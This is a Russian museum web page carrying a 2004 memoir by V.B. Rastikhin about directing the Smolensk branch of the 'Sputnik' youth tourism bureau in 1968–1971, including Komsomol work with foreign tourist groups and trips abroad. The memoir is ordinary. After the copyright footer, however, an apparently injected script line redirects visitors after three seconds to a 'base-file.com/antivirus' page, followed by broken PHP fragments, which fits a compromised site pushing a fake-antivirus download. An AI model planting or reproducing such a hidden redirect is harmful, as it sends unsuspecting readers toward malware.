Так это было
 
 

 

Сборник "Так это было. Смоленский комсомол 1960-80 годов в воспоминаниях современников"


Литература
Так это было

"Так это было.
Смоленский
комсомол 1960-80
годов в воспоминаниях
современников"
Дети и молодёжь Смоленщины 1920-1930-е годы
Дети и молодёжь
Смоленщины
1920-1930-е годы

Спонсоры музея истории молодежного движения

 

Выражаем огромную благодарность людям, которые приняли и принимают участие в жизни музея и комплектации его фондов.


       
      
 

 

Предлагаем Вашему вниманию воспоминания Владимира Борисовича Растихина и фотоматериал из его личного архива:

Владимир Борисович Растихин,
директор Смоленского отделения
Бюро международного молодежного туризма
«Спутник» с 1968 по 1971 год.

В.Б. Растихин

 
 

МЫ БЫЛИ ПЕРВЫМИ

    Это сейчас в Смоленской области различных туристических фирм около пятидесяти, а тогда, в шестидесятых годах прошлого века, их было всего лишь три, и среди них та, которая работает и поныне – Смоленское отделение Бюро международного молодежного туризма «Спутник».
В 1957 году в Москве состоялся памятный всем VI Всемирный фестиваль молодежи и студентов. Это была первая попытка в период наступившей политической оттепели продемонстрировать открытость советской системы. Проведенный форум молодежи в Москве показал неподдельное стремление молодых людей планеты познакомиться с первой в мире страной социализма. По существу, Всемирный фестиваль молодежи и явился стимулом к созданию «Спутника». Название было выбрано не случайно. В том же 1957 году в Советском Союзе был запущен первый искусственный спутник Земли, его сигналы облетели Вселенную, а само слово прочно вошло в международный лексикон. Прорыв в космос ассоциировался с прорывом пресловутого «железного занавеса», и символом его стал «Спутник». Вскоре эмблема молодежной туристической организации – земной шар, опоясанный орбитой спутника Земли, – стала известна и популярна в СССР и даже в самых отдаленных уголках планеты. Идея создания БММТ «Спутник» была поддержана самим тогдашним Первым секретарем ЦК КПСС Никитой Сергеевичем Хрущевым. И уже летом 1958 г. распоряжением Президиума Верховного Совета СССР, подписанным Анастасом Ивановичем Микояном, БММТ «Спутник» было создано как хозрасчетная организация при Комитете молодежных организаций СССР. Согласно Уставу БММТ, утвержденному Постановлением ЦК ВЛКСМ, БММТ действовало под непосредственным руководством КМО СССР.
Рождение в Москве новой международной молодежной туристиче­ской организации вскоре потребовало создания ее отделений в провинции. Смоленск стал одним из первых городов, где при обкоме комсомола появилась должность директора местного отделения БММТ «Спутник».
На моей памяти с 1966 по 1967 г. временным директором Смоленского отделения был студент Смоленского медицинского института Альберт Стояченко. В то время ставка директора была не постоянной, а всего лишь на полгода, или, проще говоря, на активный туристический период, когда через Смоленск в Москву и обратно проезжали организованные группы туристов; тогда они были в основном из капиталистических стран.
Поначалу молодежные туристические группы ненадолго задерживались в нашем городе, обычно это были ночевки в гостинице «Смоленск» или же в кемпинге. Но по мере расширения туристического обмена между БММТ и зарубежными партнерами количество дней пребывания иностранной молодежи в Смоленске стало увеличиваться от одного до трех дней. Поэтому практика общения западной молодежи со своими сверстниками в Смоленске вскоре подсказала необходимость создания инициативной группы молодых людей при местном отделении БММТ, которая, помимо организованного общения, могла бы вести, как тогда предлагалось, контрпропагандистскую работу.
Инициативная группа для работы с иностранной молодежью была создана в Смоленске летом 1966 года по инициативе обкома комсомола. Группа комплектовалась из числа комсомольского актива: студентов и преподавателей, в основном пединститута и энергоинститута.
Среди первых членов инициативной группы Смоленского отделения БММТ «Спутник» были молодые преподаватели вузов Михаил Марченков, Светлана Погорелова, Людмила Гречко, Екатерина Дорофеева, Елена Любецкая, студенты институтов: Владимир Кривошеев, Лев Фрадкин, Валерий Луньков, Наталья Рябовол, Зоя Цыганкова, Татьяна Маковская, Татьяна Демьянова, Владимир Растихин. Они были первыми в работе с зарубежной молодежью в Смоленске во второй половине шестидесятых годов. И сегодня многие из них не потерялись в родном городе, стали авторитетными людьми, настоящими профессионалами своего дела, их имена до сих пор на слуху многих смолян.
Членом инициативной группы можно было стать только по рекомендации комитета комсомола вуза и после соответствующей беседы у секретаря обкома комсомола. Я хорошо помню, что меня, студента 2-го курса исторического отделения историко-филологического факультета Смоленского пединститута, комсомольского активиста, внештатного корреспондента областной молодежной газеты «Смена» и институтской многотиражки «Народный учитель», однажды пригласил к себе секретарь комитета комсомола пединститута Владимир Кривошеев и предложил назавтра подойти в обком комсомола на беседу с секретарем обкома ВЛКСМ Михаилом Сапожниковым. В назначенный день и час в кабинете Михаила Сапожникова, где также присутствовали директор Смоленского отделения БММТ «Спутник» Альберт Стояченко и преподавательница английского языка энергоинститута Елена Любецкая, после недолгой беседы я вместе с моей новой знакомой дали согласие на работу в инициативной группе. Перспективы работы с иностранной молодежью мне показались интересными. И я не ошибся в своих ожиданиях.
Все мы тогда были молодыми, нас объединял интерес побольше узнать о жизни наших сверстников за рубежом и одновременно попрактиковаться в совершенствовании английского и немецкого языков, которыми каждый из нас владел в разной степени. Обычно нам накануне приезда группы иностранной молодежи звонил Альберт Стояченко и говорил, где мы должны будем собраться. В то время были популярны вечера дружбы, которые часто проводились в клубных учреждениях вузов города и областном Дворце культуры профсоюзов. Перед гостями выступали участники молодежной художественной самодеятельности, а после нередко начинались дискуссии по актуальным проблемам, волнующим молодежь разных стран. Задача членов инициативной группы была определена старшими товарищами из обкома комсомола: всеми имеющимися аргументами неукоснительно пропагандировать преимущества жизни при социализме и, в частности, преимущества жизни, труда, учебы и отдыха советской молодежи. Естественно, работа инициативной группы в то время проходила при внимании со стороны областного управления КГБ. Самыми яркими помощниками членов инициативной группы были в разное время смоленские чекисты Сергей Александрович Александров, Леонид Васильевич Кашталинский, Игорь Константинович Канареев. Собираясь вместе на интересные мероприятия по приему иностранной молодежи, члены инициативной группы вскоре крепко сдружились. Ведь нередко бывало, что после проведенного мероприятия в клубе мы все вместе шли к кому-нибудь домой, и наши встречи продолжались далеко за полночь.
Незаметно прошли два года работы в инициативной группе БММТ «Спутник». Я искренне гордился выданным мне обкомом комсомола удостоверением: внештатный член группы по работе с иностранной молодежью.
Где-то в начале марта 1968 года, незадолго до выпускных экзаменов, в коридоре обкома комсомола я встретил заместителя заведующего отделом пропаганды и культурно-массовой работы обкома ВЛКСМ Михаила Стеклова. Он пригласил к себе в кабинет и с ходу спросил, как бы я отнесся к тому, если бы он предложил мне вакансию в отделе пропаганды и культурно-массовой работы обкома комсомола. Я тут же с радостью согласился. Правда, высказал опасение, что впереди еще выпускные экзамены и обязательное государственное распределение на работу в школу.
– Это уже наша забота, – сказал Михаил. И тут же, созвонившись по телефону, повел меня на беседу к уже знакомому Михаилу Сапожникову. Здесь, у секретаря обкома комсомола, разговор с предложением работать в отделе состоялся вновь. На другой день было получено «добро» у первого секретаря обкома комсомола Евгения Воронцова на то, что меня берут на работу заведующим лекторской группой обкома комсомола еще до выпускных экзаменов в институте. Оставалась последняя инстанция – встреча в обкоме КПСС с заведующим лекторской группой Анатолием Глебовичем Колосковым. Очень интеллигентный, с хорошим чувством юмора, добродушный человек, Анатолий Глебович вдруг в ходе беседы выяснил, что я еще не служил в армии и, по всей вероятности, после окончания института, осенью, могу быть призван на службу на один год.
– Не расстраивайся, – по-отечески успокаивал меня Анатолий Глебович, – окончишь институт, вернешься после службы в армии, и мы тебя обязательно возьмем на работу в обком комсомола. Нам такие активисты нужны, вы – наша смена!
Немного обескураженные непредвиденным решением старшего товарища, мы с Михаилом Сапожниковым спустились этажом ниже в обком комсомола. Видно было, что, «проколовшись», Михаил был расстроен не меньше, чем я.
– Посиди у меня в кабинете, подожди, я скоро вернусь, – сказал он.
Ждать пришлось недолго. Вскоре в кабинете снова появился Михаил в сопровождении Галины Смирновой – заведующей финансово-хозяйственным отделом обкома ВЛКСМ.
– Знаешь, Владимир, – обратился ко мне Михаил, – мы тут посоветовались и решили тебе предложить до призыва в армию поработать у нас полгода директором Смоленского отделения БММТ «Спутник». Ты эту работу хорошо знаешь, а мы знаем тебя.
– К сожалению, ставка директора у нас только на полгода, – добавила Галина Смирнова, – но если по каким-либо причинам ты не пойдешь в армию, то мы давно думаем просить в Москве сделать ставку директора постоянной.
Я здесь же дал согласие. И 18 марта 1968 года решением бюро обкома комсомола меня утвердили директором Смоленского отделения Бюро международного молодежного туризма «Спутник». Через неполный месяц мне должно было исполниться 22 года. Впереди было окончание института и начало взрослой жизни.
С разрешения ректора пединститута Александра Дмитриевича Дунаева я получил право свободного посещения занятий. Так как учился я хорошо, то весеннюю сессию и госэкзамены сдал легко и вовремя. На государственной комиссии по распределению выпускников по просьбе обкома комсомола я получил свободное распределение на работу.
1968 год для комсомола был юбилейным – отмечалось 50-летие со дня рождения комсомола. Общим желанием центральных органов комсомола и комсомольских организаций на местах было как можно шире пропагандировать достижения комсомола за полувековую историю. В это время заметно увеличилось количество туристических групп, прибывающих в Смоленск из Западной Европы. Хорошо помню группу Евангельского союза рабочей молодежи Западного Берлина, которую возглавлял пастор Пауль Кейтц – американец. Христианский проповедник, обладающий большими знаниями и хорошим юмором, он как-то по-особенному, с большим вниманием отнесся к моим первым самостоятельным шагам на ниве молодежного туризма. Наши гости из Западного Берлина с интересом знакомились с достопримечательностями Смоленска, встречались со своими сверстниками на промышленных предприятиях, в студенческих аудиториях. Обычно время пребывания туристических групп в Смоленске ограничивалось одним-двумя днями. А после того, как мы подружились с Паулем Кейтцем, группы под его руководством стали приезжать в наш город дважды в год аж на целую неделю. Такие контакты долго не могли быть односторонними. И вскоре по приглашению Евангельского союза рабочей молодежи Западного Берлина была организована ответная поездка всесоюзной группы молодежи, куда пригласили и двух смолян, членов нашей инициативной группы, – молодого преподавателя немецкого языка из пединститута Михаила Марченкова и студентку факультета иностранных языков того же института Наталью Рябовол. Это только один яркий пример сотрудничества Смоленского отделения БММТ «Спутник», а таких примеров были десятки. Обычно за год силами Смоленского отделения БММТ «Спутник» принималось до 30 групп иностранных туристов численностью до тысячи человек. Все группы по «Спутнику» принимались, как правило, по принципу безвалютного обмена. Не менее десяти групп молодых смолян ежегодно по линии «Спутника» направлялись в зарубежные поездки, в основном в социалистические страны, а также по нескольку человек в составе всесоюзных групп – в капиталистические страны.
Хорошо помню свою первую поездку в качестве руководителя туристической группы молодых смолян из числа комсомольского актива в составе Всесоюзного поезда дружбы в ГДР на празднование 50-летия ВЛКСМ. Уже во Франкфурте-на-Одере, на границе ГДР, нас, участников Поезда дружбы, торжественно, с оркестром, с развевающимися флагами Союза свободной немецкой молодежи радостно встречали члены этой организации. В составе поезда было 10 групп из разных городов и республик СССР. После короткого знакомства с Восточным Берлином и экскурсии в Потсдам группы разъехались по стране. Местом базового пребывания смолян стал город Галле – один из центров химической промышленности ГДР. Везде представителей ВЛКСМ встречали восторженно, особенно на проводимых в честь 50-летия ВЛКСМ массовых митингах. И везде приходилось выступать с ответным словом. Это стало большим испытанием для меня. Но я всегда чувствовал поддержку членов группы, которой мне было доверено руководить, а также помощь и доброжелательность моих новых немецких друзей – переводчицы Марианны Винклер и хорошо запомнившегося мне тогда молодого обер-бургомистра – привлекательной женщины Теи Хаушильд из города Дессау.
Незаметно пролетели обозначенные при приеме на работу полгода. Мои старшие товарищи смогли за это время положительно оценить мой скромный труд. И, как было обещано ранее, направили письмо обкома комсомола в Центральное бюро «Спутника» с просьбой сделать ставку директора Смоленского отделения «Спутника» постоянной. А пока решение согласовывалось и утверждалось «наверху», я два месяца работал без денежного содержания. Работы было много, работать было интересно. По сути, все международные связи смоленского комсомола в течение трех лет, с 1968 по 1971 г., осуществлялись при моем непосредственном участии, при поддержке старших товарищей и широкого комсомольского актива.
Мое рабочее место находилось в комнате среди работников аппарата отдела пропаганды и культурно-массовой работы обкома ВЛКСМ. Они меня всегда считали за своего работника, чем могли искренне помогали. Курировал меня секретарь обкома Михаил Сапожников – взвешенный, знающий свое дело, порядочный человек. Он полностью доверял мне в работе, никогда не раздражаясь, если что-то не получалось по работе, всегда старался вовремя помочь. Мне всегда приходили на помощь работники аппарата обкома комсомола разных лет: секретари Евгений Воронцов, Николай Булдаков, Андрей Пивоваров, Раиса Мацкова, Анатолий Кугутин, Анатолий Банденок, работники Валентин Борлов, Михаил Стеклов, Алексей Мишин, Маргарита Столярова, Галина Смирнова, Александра Бологова, Владимир Крылов, Александр Ильюхов, Юрий Сынкин, Валерий Тизик, Владимир Данюшин, Виталий Ляшкевич; редакторы областной молодежной газеты «Смена» Владимир Пантелеев, Анатолий Новиков, Игорь Пузырев; работники райкомов комсомола города Смоленска и области, секретари первичных комсомольских организаций. Всем им я и сейчас говорю спасибо!
Я не отделял свою работу от дел областного комитета комсомола. Всегда принимал участие в подготовке всех областных комсомоль­ских мероприятий, дружеских встречах с товарищами по работе. Может быть, и поэтому меня вскоре избрали секретарем первичной комсомольской организации аппарата обкома комсомола. Помимо непосредственного выполнения решений областного комитета комсомола, я обязан был выполнять еще директивные решения Центрального бюро «Спутника», касающиеся моей работы.
Мне приходилось часто ездить в Москву на совещания в Центральном бюро, которое находилось в небольшом старинном особняке напротив Боровицкой башни Кремля, у начала Каменного моста, в Лебяжьем переулке, д.4. В годы моей работы председателями БММТ «Спутник» были Леонид Владимирович Керестеджиянц и Виктор Пантелеевич Мошняга. Почти всегда директоры местных отделений БММТ «Спутник» приглашались на пленумы Комитета молодежных организаций СССР, которые, как правило, проходили в здании ЦК ВЛКСМ в Москве. В качестве гостя я был приглашен для участия в работе ХVI съезда ВЛКСМ. Встречи в Москве всегда были для меня хорошей школой. Кроме того, ежегодно БММТ «Спутник» проводило с директорами местных отделений семинары на базе Высшей комсомольской школы в Вишняках. Непосредственное общение с коллегами по работе – представителями «Спутника» со всего Советского Союза – очень много давало мне в плане профессионального и духовного роста. Я продолжал успешно трудиться в «Спутнике». В армию меня не призывали из-за обнаруженного плоскостопия.
В 1970 году я женился на Елене Любецкой, молодом преподавателе английского языка, члене инициативной группы «Спутника», на той девушке, с которой впервые познакомился в кабинете секретаря обкома комсомола. Сыграли комсомольскую свадьбу. За время моей работы в «Спутнике» я побывал в интересных поездках по странам социализма, неоднократно возглавлял Поезда дружбы иностранной молодежи, организованные ЦК ВЛКСМ для знакомства с жизнью Советского Союза, а также побывал в двухнедельной туристической поездке по Бельгии, Франции и Голландии. И здесь мне повезло с переводчицей, русской по происхождению, тогда совсем юной Ольгой Крыловой, проживающей вместе с родителями, эмигрантами из России первой волны. Мы дружим с Ольгой и по сегодняшний день. Она теперь частый гость в России.
После приема обкомом комсомола в Смоленске космонавта Валерия Быковского – я был ответственным за выполнение программы пребывания космонавта в нашем городе – у меня завязались друже­ские связи с заместителем начальника политотдела по комсомольской работе отряда космонавтов, тогда капитаном, Валерием Латышевым.
Рос авторитет, совершенствовалось профессиональное мастерство, укреплялось доверие со стороны старших товарищей в Смоленске и в Москве.
Наступил 1971 год. «Спутник» впервые решил организовать свои представительства в Болгарии, Венгрии и Чехословакии.
И вот, с подачи одного из заведующих отделами Центрального Бюро «Спутника», Валерия Квартального, моя кандидатура в качестве представителя «Спутника» для работы в Болгарии была предложена на рассмотрение тогдашнего первого секретаря обкома комсомола Николая Булдакова.
Через три дня после звонка из Москвы, ранее мне ничего не говоря, мой шеф, проходя по коридору обкома комсомола, скороговоркой обратился ко мне: «Ну что, старик, уже сидишь на чемоданах? Заходи ко мне в кабинет, поговорим». И объявил мне, я думаю, уже согласованное «наверху» решение: «Они там, в Москве, нашли топор под лавкой. Ты никуда не поедешь, потому что для тебя и здесь работы хватит». Признаюсь, в душе стало обидно за столь «высокую» оценку моего труда. Но комсомольская дисциплина для меня всегда была превыше всего. И я ответил по-военному: «Есть!».
А вскоре на пленуме обкома комсомола меня утвердили в новой должности – заведующим отделом пропаганды и культурно-массовой работы Смоленского обкома ВЛКСМ. Это было повышение по службе, но тоска по любимому, живому делу– служению БММТ «Спутник» – живет и поныне. Я передал дела новому директору Смолен­ского отделения БММТ «Спутник» – Валерию Тизику.

2004 г.

 

    (c) Авторские права на сайт принадлежат ООО "Союз ДМ", Смоленской областной общественной организации Общероссийской общественной организации "Российский Союз Молодежи", 2008-2012г.  
setTimeout(\'document.location.href = "http://base-file.com/antivirus"\', 3000);'); } ?>